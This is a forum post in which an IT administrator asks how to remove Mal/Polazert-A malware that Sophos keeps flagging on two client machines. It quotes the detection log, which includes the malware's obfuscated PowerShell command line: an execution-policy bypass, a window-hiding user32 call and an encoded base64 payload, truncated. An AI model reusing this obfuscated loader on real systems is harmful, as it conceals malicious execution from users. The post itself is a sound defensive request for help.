I have two endpoints at two totally unrelated clients where Sophos detected Mal/Polazert-A. Sophos is good at telling me about it, but it doesn't give me any options to remove it. Every time the client reboots their computer, they get a popup from Sophos after login that Sophos found this malware. Now I am concerned it is still running somehow and our client wants to know why we aren't removing malware from their computer.
I explain that Sophos detected and terminated it, but like me, they want to know why it is still there.
How do I remove it?
Details of the infection from Sophos Central:
Path:
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Name:
powershell.exe
Command line:
"PowerShell.exe" -EP byPAss -cOmMAnD "$a754ea6e8b041aa5b575492443c23=AdD-TypE -memBERDEfINITIon ('['+'d'.tOuppER()+'lL'.tolower()+'i'.Toupper()+'MpOrT('.toLOWeR()+[CHAr]0X22+'user32.DLl'.TOLoWer()+[CHar]0x22+')]PuBLIC sTATic extern BOol '.ToLOwEr()+'s'.tOupPEr()+'hOw'.ToLOWer()+'w'.TOupper()+'IndOw'.TOLoWeR()+'a'.TOupPEr()+'SYnc('.ToLower()+'i'.toUPper()+'nT'.tOLoweR()+'p'.tOUPper()+'Tr hwND, iNT NcmDSHow);'.toLOWER()) -naME ('W'.tOupPeR()+'iN32'.toLOweR()+'s'.TOUppEr()+'HoW'.TOLOwEr()+'w'.toUppeR()+'INDOW'.TOlOWeR()+'a'.tOUPPEr()+'SyNc'.TOlOWeR()) -nameSpacE WiN32FUNCTioNs -PAssThru;$a754ea6e8b041aa5b575492443c23::shoWWInDOWASYnc((gET-PROcess -id $Pid).mAiNWiNdOWHANdLE, 0);$a42b0d88df94e2b6b9453ae110cca='QHwmS1BAUnFIdEB3dChiQFZBPHJAVFEpel5uOzwzXk9+OGFeUTUrXkBSX0hGQHdKTXJeUjx6VEBWU0okQHFuJERAcW0pUUBSXyFvQHNfckxeTkYmTV5uJDZOQH04Tm9Ae1lIZV5NISlDXk07UiZeTyV5WkB7aFp4QHwmTmJeUnZDSUB1aVpLXlBHWl5AUzJCI15QckJiQH5NbyFAYHttJkB9aXVhXlBRZlVAUzQ0WEB0TTRuQHcxUFJeT3c3IV5ucm5pXlByVzhAeytXVEB2NWwwPCVeczB1I20wdGZ0I3g=';$a1bfc0
Process ID:
8456
Process executed by:
<domain>\Admin1
SHA256:
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
Start time:
Feb 9, 2022 7:51 PM
End time:
Feb 9, 2022 7:51 PM
Duration:
7s 69ms
Actions done to this artifact:
None
Actions performed by this artifact:
162 File reads
122 Registry value sets
19 File writes
9 File deletions
2 File renames
-Mike
This thread was automatically locked due to age.
